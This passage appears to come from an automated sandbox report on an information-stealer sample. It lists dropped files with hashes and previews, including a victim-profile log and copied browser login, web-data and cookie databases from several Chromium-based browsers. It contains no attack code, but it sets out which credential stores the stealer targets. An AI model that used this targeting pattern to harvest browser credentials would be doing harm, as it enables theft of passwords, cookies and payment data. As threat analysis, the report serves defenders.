                                                                                        SHA-512:173D512ABBE30A0E411F9F9380AF3EAF5C7ECF2D3CBC29299D7599C7E1955FB28DD752AAC996E64D1B7626BD0CA3FF1A89F299C778DD03241793A5E564E15728
                                                                                        Malicious:false
                                                                                        Preview:..- IP Info -....IP: 102.129.143.39..Country: Switzerland..City: H.nenberg..Postal: 6331..ISP: Datacamp Limited - A212238..Timezone: +01:00....- PC Info -....OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - 7LYK_YVW (1280, 1024)..HWID: 7277006835843898..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -....Passwords: ....Cookies: . 1...Wallets: ....Files: . 24...Credit Cards: ..

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dslegre2.xc3.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jotz5ln3.yuw.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1

                                                                                        C:\Users\user\AppData\Local\Temp\bravesoftware_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\bravesoftware_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\bravesoftware_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\browser_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\browser_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\browser_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\centbrowser_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\centbrowser_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\centbrowser_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\citrio_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\citrio_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\citrio_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\coccoc_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\coccoc_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\coccoc_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\comodo_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\comodo_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\comodo_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\coowoo_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\coowoo_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\coowoo_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
